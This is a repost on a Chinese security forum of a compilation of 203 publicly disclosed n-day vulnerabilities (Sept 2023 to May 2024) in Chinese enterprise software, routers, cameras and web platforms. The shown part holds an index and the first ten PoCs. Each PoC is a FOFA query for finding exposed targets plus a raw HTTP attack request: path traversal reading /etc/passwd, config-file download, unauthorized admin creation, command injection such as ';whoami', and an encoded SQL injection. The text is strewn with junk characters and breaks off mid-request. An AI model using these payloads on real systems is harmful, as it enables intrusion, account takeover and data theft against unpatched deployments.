找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1550|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406
1 i3 a% O, V- E- `9 i! ~. P& g" Q道一安全 2024-06-05 07:41 北京3 W' o6 g$ Y' S1 h6 @" j+ D: S
以下文章来源于网络安全新视界 ,作者网络安全新视界
/ o& _9 S4 A" P# M0 l7 [, }4 F. R' b: U. b6 P3 F, W
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。3 m0 T/ {* X' o9 ?( i/ O  }' ]2 i

* Q1 L$ d9 ^* W. S- \- g漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
$ ?9 Z/ q* T" t% @+ [3 g" ?  m; ^4 j$ V3 X$ H5 ^
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
7 S# I- @: m  Y9 A: C
' f; ?5 ~/ U2 i  t' t: c# X文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。# W5 M6 g% Q7 H( W0 d6 c
* F$ ^" i5 l) y" y& g, d' u
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。% V4 p4 q, Q: |& L! D

, D& k% I2 e  d( ^1 S6 [% r: q! D! {# B+ f5 k
声明" ?% G+ p% W7 [1 h/ S2 L5 v

* f5 J3 F+ |& e+ l$ C, M- @8 [/ f1 \, V为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
2 z, B/ C8 [  T* n' N; H6 o+ |+ A8 w; [  N. p
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
/ Y8 n, l  q% {5 |! P% d
; c* \" i7 _2 `  W8 {4 g
5 L/ g) ^: D0 ?6 [
0 |! E( ^# w2 e* ?+ u目录
# s5 s$ ]+ H9 }5 t2 y9 ^+ }
; _, y" V8 ]! b" ?6 ]$ Q013 C  J7 M1 Y, V

( j* R& `  `& H7 H" ?  h1. StarRocks MPP数据库未授权访问
3 T2 h( F5 {% I# s2. Casdoor系统static任意文件读取
; T; ]7 n( \+ J+ m3. EasyCVR智能边缘网关 userlist 信息泄漏: N5 l2 q  {  U6 x! d# D& N
4. EasyCVR视频管理平台存在任意用户添加
# s9 g( `/ a1 r# Y' Y( [5. NUUO NVR 视频存储管理设备远程命令执行+ B( a* e3 a% d; p/ P" {6 V
6. 深信服 NGAF 任意文件读取8 w5 X$ n4 w; s0 f, [( H# J3 F7 H
7. 鸿运主动安全监控云平台任意文件下载, b8 D! C4 ~) |7 a+ a$ h6 N0 a. ~
8. 斐讯 Phicomm 路由器RCE8 `! k, C: M3 G8 v
9. 稻壳CMS keyword 未授权SQL注入, f- B6 A: o4 k; |' p/ S
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
3 K* E1 o6 C% q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
- `$ K: s* o7 Y) j9 @' ]( y4 W$ c12. Jorani < 1.0.2 远程命令执行
) x, H9 L% R5 o# {6 V13. 红帆iOffice ioFileDown任意文件读取/ w; w1 i8 c5 b: [( D) f
14. 华夏ERP(jshERP)敏感信息泄露  h  b4 P5 s3 {, w4 {7 I& d
15. 华夏ERP getAllList信息泄露
" M" O) K1 D* j' {16. 红帆HFOffice医微云SQL注入8 ]4 J, S5 Y5 f* ?: f* d3 O  l
17. 大华 DSS itcBulletin SQL 注入
* A: o8 m# B7 M, P) q18. 大华 DSS 数字监控系统 user_edit.action 信息泄露4 u& y) n4 `  W" Q" k, p! t" ?# e
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入3 J) r+ J" Z" z  e, D9 y5 F9 _8 e
20. 大华ICC智能物联综合管理平台任意文件读取
1 I& h( Y1 f6 R# P% |4 s21. 大华ICC智能物联综合管理平台random远程代码执行
# j0 x4 O3 ]+ B& q22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 W, @& K) O- J' n  `$ u7 i23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
0 |$ i! H9 T! T! x+ [/ F24. 用友NC 6.5 accept.jsp任意文件上传' v, K/ m! m4 j# I3 I% k$ \* e0 o* z5 p
25. 用友NC registerServlet JNDI 远程代码执行& b2 D" p* Y; B! o# t4 R
26. 用友NC linkVoucher SQL注入2 M1 Q) w3 g% a" n( V" l
27. 用友 NC showcontent SQL注入
: P" K( \1 L3 h0 M" T28. 用友NC grouptemplet 任意文件上传/ R- k+ o5 R  i  z8 _+ Y0 ?. I9 {
29. 用友NC down/bill SQL注入
# e: z, Y% S* Q  N30. 用友NC importPml SQL注入2 h8 J0 a9 O2 L9 d- `% k' h
31. 用友NC runStateServlet SQL注入
, j; g0 o- ?& K, g) L4 L: a32. 用友NC complainbilldetail SQL注入9 s& W4 ?# e8 {7 r! @- q& H
33. 用友NC downTax/download SQL注入
/ M) F7 C% ^: ~* d& W0 c34. 用友NC warningDetailInfo接口SQL注入% u2 H" S/ v6 G; n5 H  K, ~
35. 用友NC-Cloud importhttpscer任意文件上传
3 p+ |' w6 R  Z3 t- N36. 用友NC-Cloud soapFormat XXE& U. x( B% F% H, }
37. 用友NC-Cloud IUpdateService XXE. d. {. e  f4 a5 F5 e7 t( X9 Y
38. 用友U8 Cloud smartweb2.RPC.d XXE
+ C& t/ J) W3 F+ r39. 用友U8 Cloud RegisterServlet SQL注入
4 V9 v2 ~4 l/ s; Y# v) R40. 用友U8-Cloud XChangeServlet XXE7 Z* W$ x4 R( h4 A8 @1 V2 e
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入4 |, |) L0 r" Q6 d8 j) @+ O
42. 用友GRP-U8 SmartUpload01 文件上传7 ^5 G* w5 ^  M) G
43. 用友GRP-U8 userInfoWeb SQL注入致RCE" c4 ~( h( v# V/ m# t
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ i, n( H% Z0 U; W% t! f4 h, G45. 用友GRP-U8 ufgovbank XXE
, a" G$ `  \# K) u46. 用友GRP-U8 sqcxIndex.jsp SQL注入! M# L5 x- b; f6 a9 W$ T
47. 用友GRP A++Cloud 政府财务云 任意文件读取
1 F/ D6 g6 ~8 U0 G( R* k3 i3 _48. 用友U8 CRM swfupload 任意文件上传
0 H1 V7 T; q/ B1 F" g+ d49. 用友U8 CRM系统uploadfile.php接口任意文件上传" A- L( |( V0 g; y
50. QDocs Smart School 6.4.1 filterRecords SQL注入4 a' Y+ ^3 N  s6 {
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入4 p6 d& J6 f$ q" [7 r
52. 泛微E-Office json_common.php sql注入
% f) l4 x" ^& r; l4 G" [" x. N! E53. 迪普 DPTech VPN Service 任意文件上传) y' G* x; b1 ~; a% O1 J/ S! j
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
6 {  n' l) W) b1 u0 W& l55. 畅捷通T+ getdecallusers信息泄露
* Y' N2 s8 O$ ]# x4 z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
( t7 L) {; Q% [6 ?) `' B* h57. 畅捷通T+ keyEdit.aspx SQL注入
! Y+ D9 U$ }: q( ~58. 畅捷通T+ KeyInfoList.aspx sql注入
* _# |9 }: p5 ~9 x9 }! n2 g59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" \6 L# P$ e% \- E  O; R60. 百卓Smart管理平台 importexport.php SQL注入
2 t- P, [9 V5 |* g7 H$ J61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 ?: r! m& n+ l
62. IP-guard WebServer 远程命令执行2 b. `9 g7 ~/ D1 `! Z* h) \9 n
63. IP-guard WebServer任意文件读取
: @9 W" ?* ^9 g. E64. 捷诚管理信息系统CWSFinanceCommon SQL注入0 }6 M: D4 y) {8 i+ z: T1 }& {
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过7 S% P3 p$ \1 \' B6 w
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入. E) s2 l" F3 {7 l
67. 万户ezOFFICE wpsservlet任意文件上传
3 f' q. m/ `* K68. 万户ezOFFICE wf_printnum.jsp SQL注入) M: c$ p# r4 I8 K7 C
69. 万户 ezOFFICE contract_gd.jsp SQL注入
. P; V! [$ o& D" x70. 万户ezEIP success 命令执行/ z* V; N5 X, g' m- {. _
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
: }7 T$ ?% e) k0 c  w" ?72. 致远OA getAjaxDataServlet XXE
/ D/ k; Y9 l; K73. GeoServer wms远程代码执行
: o0 ~5 N! H. ?2 f; f& N; m2 K74. 致远M3-server 6_1sp1 反序列化RCE4 i6 ?( v4 {3 x5 ^0 v
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
. b& C3 n* U# d7 z% y76. 新开普掌上校园服务管理平台service.action远程命令执行
8 g! C( O+ l3 Z/ d( F) d77. F22服装管理软件系统UploadHandler.ashx任意文件上传: e  t7 }" E+ V+ L3 E" y8 ?
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
4 G. k' g- V3 q79. BYTEVALUE 百为流控路由器远程命令执行6 M+ I6 [# Y: {1 V
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
0 e8 k: c9 f1 C% X; ^" M6 l# e81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
& h) E/ s- D) V82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
5 I; @  ^+ ?- \83. JeecgBoot testConnection 远程命令执行' V1 e$ R+ c2 @
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
& h+ m' M" S- h, t85. SysAid On-premise< 23.3.36远程代码执行
% M: a3 |4 M+ B; v, c  N: L86. 日本tosei自助洗衣机RCE
1 p0 x. |6 P: l- a) y( A0 o: Q87. 安恒明御安全网关aaa_local_web_preview文件上传& |  i" u9 n% U
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行" k9 K' v5 q7 {! s& s, ]: e
89. 致远互联FE协作办公平台editflow_manager存在sql注入: @: o% n1 q2 |5 {7 H% k
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
- ]( W0 G- d; B0 t; H* F+ ]% u3 ]91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" ?6 W% U% k3 B92. 海康威视运行管理中心session命令执行: r, W$ V; d/ E: s* P# O2 P6 G- i
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
* B% i4 c0 U8 H9 g0 r94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
  ]3 I. g* f9 u. R8 o* Q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行  z4 O. h( S" K% G0 i8 q9 ]
96. Apache OFBiz  18.12.11 groovy 远程代码执行( r0 H. R1 P8 l* [0 x; y5 v  f* H
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
0 \; X. h# n& n9 d) ]; @7 I98. SpiderFlow爬虫平台远程命令执行& i, w9 T4 o" O9 p
99. Ncast盈可视高清智能录播系统busiFacade RCE
+ _1 s  Q8 D- |7 s/ ^/ M100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
; P, w5 |. ?9 o- N1 L* A" Y101. ivanti policy secure-22.6命令注入: T9 @  V) C& I0 H) x( ]
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行  E) b9 A6 [. I) F4 _/ Y
103. Ivanti Pulse Connect Secure VPN XXE
7 a, o! `) b* i, t7 t104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
, z  b4 b* Y8 R0 g* C1 R5 S" T' n105. SpringBlade v3.2.0 export-user SQL 注入
/ y& W1 }0 K8 _" H* x" Z; R106. SpringBlade dict-biz/list SQL 注入
, m! O: e" e1 s; S107. SpringBlade tenant/list SQL 注入
7 y4 t) Y7 M3 ?- K. a% q9 y$ _) w108. D-Tale 3.9.0 SSRF
# y& {+ ]5 D' P6 t) v109. Jenkins CLI 任意文件读取
: c% Z, t; ^9 j+ P. F+ a$ }110. Goanywhere MFT 未授权创建管理员
& o% f+ Q4 n9 V, ]. U7 S  g111. WordPress Plugin HTML5 Video Player SQL注入
- Q/ H# K" W; [6 Z4 n, g112. WordPress Plugin NotificationX SQL 注入
; U* H# K* Q9 _% F/ t4 b& z113. WordPress Automatic 插件任意文件下载和SSRF. x$ A) c. h4 p2 w, V* S* O
114. WordPress MasterStudy LMS插件 SQL注入' E9 e- s& Y  G. |! {" b
115. WordPress Bricks Builder <= 1.9.6 RCE
% ~: g/ w2 }& A) s3 @4 Y: E6 d116. wordpress js-support-ticket文件上传
9 A5 |8 y" A" y7 ^: P! J117. WordPress LayerSlider插件SQL注入
8 c+ K0 s. ]: Q  R0 a118. 北京百绰智能S210管理平台uploadfile.php任意文件上传, u2 @& }# Y! t+ Z& R' G2 `
119. 北京百绰智能S20后台sysmanageajax.php sql注入9 P' s1 K4 C7 a$ c
120. 北京百绰智能S40管理平台导入web.php任意文件上传1 g' L# M* H" J* a
121. 北京百绰智能S42管理平台userattestation.php任意文件上传& a( ~7 O1 ^0 K1 ?2 C1 W$ t
122. 北京百绰智能s200管理平台/importexport.php sql注入
7 U/ D% H, @2 {$ P9 |$ N" B123. Atlassian Confluence 模板注入代码执行
( ~* @0 {# P6 y9 a: T124. 湖南建研工程质量检测系统任意文件上传+ t# s$ d3 E. @! Q
125. ConnectWise ScreenConnect身份验证绕过6 q% {# [$ B; }% [
126. Aiohttp 路径遍历, o( ^( q4 T) L2 E9 A$ l. A0 w" u
127. 广联达Linkworks DataExchange.ashx XXE, Y8 z2 ~& B8 Y
128. Adobe ColdFusion 反序列化
' h# t  A+ n0 ~6 l4 _$ n  e129. Adobe ColdFusion 任意文件读取3 N: ^( {" K1 a$ _& T) @! g
130. Laykefu客服系统任意文件上传# j: H/ `% \5 O4 J7 a
131. Mini-Tmall <=20231017 SQL注入! b4 q; j, ~4 t* ]4 s9 y
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
# t: S7 V' ?# X9 d; ]0 M: n% @$ R% D133. H5 云商城 file.php 文件上传
$ l# k9 l2 b3 F# P* H( R134. 网康NS-ASG应用安全网关index.php sql注入
# ^5 h1 Q6 ^5 w0 k  o135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) g, Y0 J7 [1 R: N6 R
136. NextChat cors SSRF2 Y5 q+ d) h, p8 b- F
137. 福建科立迅通信指挥调度平台down_file.php sql注入$ W) Z2 M9 o9 g: X
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入  T4 P/ h+ V* a; h& \. [, l# R  l7 J2 Y( o
139. 福建科立讯通信指挥调度平台editemedia.php sql注入9 d% _% j" a3 P6 V
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. o9 O* |4 F) _
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
$ P, S  r8 i6 I5 s+ E# G142. CMSV6车辆监控平台系统中存在弱密码" k2 J; e3 [$ x. K( F8 d3 {
143. Netis WF2780 v2.1.40144 远程命令执行
; k6 f& C! m/ b+ m5 d& F144. D-Link nas_sharing.cgi 命令注入1 x4 H& s/ N$ q8 u1 ]) a6 A" m
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入6 x$ s- m+ w2 K" I7 e
146. MajorDoMo thumb.php 未授权远程代码执行) T0 w5 D+ X* \* D% X5 q5 z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
8 u/ i2 K; ?$ e* Z# z( n: Z148. CrushFTP 认证绕过模板注入  V7 w% [, D% q7 W* J5 W
149. AJ-Report开源数据大屏存在远程命令执行
9 a5 X" J8 u3 o7 p150. AJ-Report 1.4.0 认证绕过与远程代码执行
7 W0 C3 P) q5 ~- g% X" a151. AJ-Report 1.4.1 pageList sql注入4 }; l( J' y. P2 }! z8 k; V1 T
152. Progress Kemp LoadMaster 远程命令执行% I0 i" C) w" [0 ~
153. gradio任意文件读取+ e/ r& Q+ @* n% e
154. 天维尔消防救援作战调度平台 SQL注入
. F, F; f% a! |, G155. 六零导航页 file.php 任意文件上传
- A7 K: A) }  U' P156. TBK DVR-4104/DVR-4216 操作系统命令注入4 s) M1 y  D( I
157. 美特CRM upload.jsp 任意文件上传) [& Y$ ~/ V2 b( [7 B
158. Mura-CMS-processAsyncObject存在SQL注入$ O9 }7 W' `. o0 P1 r' ?- S
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
/ d) D/ V2 n; l/ s5 T; y5 p160. Sonatype Nexus Repository 3目录遍历与文件读取
' j$ U5 c; {; X3 K" Q4 X0 i161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
! _, Y& }" d2 t1 J5 c" R162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传. U& G( H2 r4 b( I( d
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传. W; c) P% X- L% {$ k
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传* E( E5 W7 B4 d6 w- L- d0 F
165. OrangeHRM 3.3.3 SQL 注入6 G% C, e+ i3 A( X: o, u( h
166. 中成科信票务管理平台SeatMapHandler SQL注入& t% _/ t: }* E( f, s# i2 W
167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ w* K+ d% @6 r. c1 V1 q) S1 E168. 宏景EHR OutputCode 任意文件读取
7 p; z5 X; M+ r# H8 H# |$ B# N$ q169. 宏景EHR downlawbase SQL注入) x/ @  h1 J, J$ e+ B# C
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
7 M, ^9 h6 t( w$ K9 b" X171. 通天星CMSV6车载定位监控平台 SQL注入4 T- Z2 ^% {* \: }
172. DT-高清车牌识别摄像机任意文件读取! E$ n4 n1 `" W# N5 `7 S6 }  Z6 {2 k
173. Check Point 安全网关任意文件读取/ O: D. f4 z' v6 c
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
; S5 t' m  w$ v5 O( h% t175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入& {2 l6 w  d4 u$ R9 ]# |
176. 电信网关配置管理系统 rewrite.php 文件上传' I8 i4 g: X8 G# y
177. H3C路由器敏感信息泄露
- {: j3 g, o5 b3 f1 T+ Z178. H3C校园网自助服务系统-flexfileupload-任意文件上传) R( R% }) i4 @# _; Y7 h/ \
179. 建文工程管理系统存在任意文件读取: I  s* `% r1 s& X, M; S
180. 帮管客 CRM jiliyu SQL注入
0 U: Y/ M5 i. P* @9 ?181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
4 Z+ U5 e* \( l4 p# R4 B* F% L) ?182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建' t! H( N. E( A6 `) V3 X8 T
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
; ?2 {* c+ q' C5 g184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加5 P/ {7 [# U7 w8 r7 P5 Q  Y' P
185. 瑞友天翼应用虚拟化系统SQL注入
' `& P) g9 H, \8 r186. F-logic DataCube3 SQL注入$ M* j0 K8 a- l7 ^- K. v" ~
187. Mura CMS processAsyncObject SQL注入- q  u+ N% U* U# c. Q3 a
188. 叁体-佳会视频会议 attachment 任意文件读取
# Z1 J/ U3 H- ~9 y2 V+ V189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 N7 Q# |  z; v4 t) f8 _190. 短视频矩阵营销系统 poihuoqu 任意文件读取
6 q" L- j: F4 r6 t" o; R( `191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
9 {& q# a' K' a; J! G2 a- j192. 富通天下外贸ERP UploadEmailAttr 任意文件上传5 ]3 N. s3 w% [1 [2 L
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行! S, {& B/ Y  P2 {4 p8 L. `
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
! P5 B1 D8 o7 X$ Y: t  G195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
8 a& u7 G; G3 D1 S5 l2 w196. 河南省风速科技统一认证平台密码重置6 @0 E2 T2 q3 x7 T, s
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
: ?1 M0 x: S; t) r8 A198.  阿里云盘 WebDAV 命令注入- s2 Z- B1 v! d3 N) R7 R
199. cockpit系统assetsmanager_upload接口 文件上传3 e& z3 Y% `* q4 r2 v
200. SeaCMS海洋影视管理系统dmku SQL注入4 T4 ?' q/ P9 z+ y3 a3 B
201. 方正全媒体新闻采编系统 binary SQL注入8 Y, T' W1 Z. @3 q9 e
202. 微擎系统 AccountEdit任意文件上传- M& u: \% O) F0 w4 [% B! m, U
203. 红海云EHR PtFjk 文件上传
% V; p# s; y: a4 q! }4 c9 @$ Y% I( v) T- L! X" I9 P
POC列表
3 m5 e' r2 n5 V' \0 ~8 p3 {% W# a# b# [) h, g1 q
02) r) Q4 D: Z* T/ ^9 ~9 L
- u  Z) L+ S& [+ \, \
1. StarRocks MPP数据库未授权访问
  P0 U* s5 F2 |8 F0 I: T0 \FOFA :title="StarRocks"
7 e2 A1 ^- C4 |+ Y# v' s& o# M4 VGET /mem_tracker HTTP/1.1
& R! i; E. L9 G9 Q5 f' bHost: URL- S7 ?) u3 E; Q  h" O: o
- R5 L, K5 k! w9 ]

1 F* X: g% S$ C$ B2. Casdoor系统static任意文件读取4 K# T# _! b0 m, ^- f
FOFA :title="Casdoor"
/ q1 g2 G8 y2 @1 s4 b4 |( PGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1% y" d: t. x5 x2 `7 |4 a% y/ X9 ]- I
Host: xx.xx.xx.xx:9999
! q- J+ |6 _" O" Z3 x' k, z% b3 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 u6 z& w1 B6 k* D" \- |2 Y
Connection: close
3 B0 l% S- k9 z5 K  t" C& G, _# pAccept: */*
/ W4 i9 }% p- @2 t9 K$ i4 EAccept-Language: en
5 N+ B9 Q9 n( r" G- k0 h# L. u4 }! TAccept-Encoding: gzip
$ s' J1 @- ?7 G% H! [% h9 C" \2 P$ p8 d/ r
( B: Q# W6 f9 c$ Q& F6 j/ T1 a
3. EasyCVR智能边缘网关 userlist 信息泄漏
* D1 U4 a3 g/ V9 F, C! X! qFOFA :title="EasyCVR"
3 r/ |7 @! d: [3 K. V7 fGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
! L) N8 {+ ^3 tHost: xx.xx.xx.xx$ i7 `) [5 n6 q$ W9 T
: a& y2 s: D# w0 X
: b% J9 `0 B: \: k* ^% z2 B1 U
4. EasyCVR视频管理平台存在任意用户添加
- E9 }6 A" x( V9 k( C+ Q+ VFOFA :title="EasyCVR"% E/ i3 |2 ^4 L, H" G& R- W; O
0 k$ p: Z5 A8 G" h
password更改为自己的密码md5
! U' n" k9 R- j( b  v$ Y0 SPOST /api/v1/adduser HTTP/1.1
3 u2 I, R2 |: P6 Z; o6 l  CHost: your-ip. S; {* x, T* p' {+ K! ?; H/ X
Content-Type: application/x-www-form-urlencoded; charset=UTF-8, B9 R* X; O2 D) E. `) S- W
4 r' f, a$ E0 N* Z
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
7 N4 I8 E5 a0 ]4 ]' L5 k
  A( W1 \$ D" T( f/ ~: X/ }$ r; f( N# A) U6 E
5. NUUO NVR 视频存储管理设备远程命令执行1 Y/ R1 q0 L1 }8 ]5 X
FOFA:title="Network Video Recorder Login"
% A7 ]7 `: ~# N% cGET /__debugging_center_utils___.php?log=;whoami HTTP/1.18 e6 k" `# n) V& i2 `
Host: xx.xx.xx.xx
7 Q# {' ^6 n' P% ]+ ~3 ~2 d7 t1 e1 t  [' k( q3 Y  I% Y7 }) E& Z+ r
  \$ Y, t% L* P6 C4 ^# B" l! R
6. 深信服 NGAF 任意文件读取
) [  Y2 [- J( K0 Z. b! IFOFA:title="SANGFOR | NGAF"' ]& E% c& c+ x  X
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
, W$ O5 P/ h) k3 j$ c; G) e' o5 RHost:1 P+ Z8 F  j. X) i/ q6 D+ w

( t( M- D6 J+ t  }7 _' T
9 x3 ]3 w5 H! B- v2 L3 o$ C8 r7. 鸿运主动安全监控云平台任意文件下载
$ Q% w! P/ R' \3 _- L' F0 HFOFA:body="./open/webApi.html") J3 |& }& A6 \3 |
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
3 v5 G; i8 b  T9 ?# o5 VHost:
2 |" f: L0 z& G: C& S3 {5 q) g4 `; f' o! p' W  V

. b, `3 g' n4 j0 Q" }  Q* @8. 斐讯 Phicomm 路由器RCE( m2 i+ V0 q4 }; J% `
FOFA:icon_hash="-1344736688"7 t. M& z& m5 p7 U- |* O
默认账号admin登录后台后,执行操作
+ _  A& d. F, T1 dPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
+ F2 J" |0 _$ \6 MHost: x.x.x.x0 O: I  X# O, Z& W
Cookie: sysauth=第一步登录获取的cookie+ }& D2 X- I# ~/ O  l: D/ Z- M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz; T  w7 k& R/ |) ?( k# K) M! b
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" J* h" N/ {0 R7 h( z5 Y
+ F1 u( y! Q5 y5 W- b  W! P: P
------WebKitFormBoundaryxbgjoytz+ G: n+ K) n5 U4 ^& G' w
Content-Disposition: form-data; name="wifiRebootEnablestatus": V3 c4 f, L* P

& U; u+ j6 Q- c' Y- Q8 Q* D%s; ]9 |4 V. |, d! K. w9 y; I% D
------WebKitFormBoundaryxbgjoytz. H% Y% A2 I) e7 k
Content-Disposition: form-data; name="wifiRebootrange"" P) H4 C& z/ ?) u# e1 k. M- O: e

& U% d% S; v* Q8 x. X; O  H12:00; id;
  r3 ~4 I- m) i! ?------WebKitFormBoundaryxbgjoytz& V& R, d' n$ ?) U
Content-Disposition: form-data; name="wifiRebootendrange"7 \9 C, t0 n1 V$ z+ K9 m

0 h1 ?: d: _9 M' }%s:+ G% s' V( D3 k( d4 ^
------WebKitFormBoundaryxbgjoytz
- o7 R( G7 L: ^, g" u" V* Y8 Z" vContent-Disposition: form-data; name="cururl2"" B' V" i5 |* ~; v' P7 Y
( s% X$ p- S3 c+ {& }9 D. i3 v

, h  U. v) R( T- f. u4 j7 N0 x------WebKitFormBoundaryxbgjoytz--! k, j8 C* X- ?1 a7 D. |
/ M7 F) |6 \0 O, C' w% N* R, F5 o

' b2 w+ e( f  \# x" Z" |# P! [9. 稻壳CMS keyword 未授权SQL注入
) n6 i% s; L$ H% ?- u1 v+ U; nFOFA:app="Doccms"6 k! Z0 F- m! M4 A) n6 }+ w
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.15 G$ T4 Q7 l- L8 k6 ?3 I) [% X
Host: x.x.x.x
5 q) Y: z, C" L0 J0 w2 [8 I  o3 B- R# R* t$ i+ u# i0 [2 h

  e$ {1 c2 s' B' i# x! \7 X* [$ Spayload为下列语句的二次Url编码
4 R( H2 U8 }- E
7 ~) r- W; F/ P; a, k5 r' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
! O) ?/ V+ \9 q3 Y; R
; u) C: a4 \9 F% s0 [  l10. 蓝凌EIS智慧协同平台api.aspx任意文件上传& A" {( Q. I) S7 w& q
FOFA:icon_hash="953405444"/ H  x8 S1 U# b8 k9 Z. v. X

4 m! v5 C7 I( d2 m, }5 [. W文件上传后响应中包含上传文件的路径4 ^. P, H% m/ ~% |( t5 a
POST /eis/service/api.aspx?action=saveImg HTTP/1.1& z* Z- Z) ~, ?
Host: x.x.x.x:xx5 a9 @5 r4 T( m5 _$ ~$ R" i. |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
' x2 I& j! v2 Z$ k! h, WContent-Length: 197
7 _6 U) r7 v1 L6 ~* b0 _: F& SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.96 @/ a* L# H/ E; i/ G
Accept-Encoding: gzip, deflate
; Z* G- A) G  Y- W7 }3 s  ?0 QAccept-Language: zh-CN,zh;q=0.98 P/ C, X- S0 o1 `
Connection: close" `: R4 n4 I- A5 k2 j$ r& I+ G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ S3 e; C% H! Y
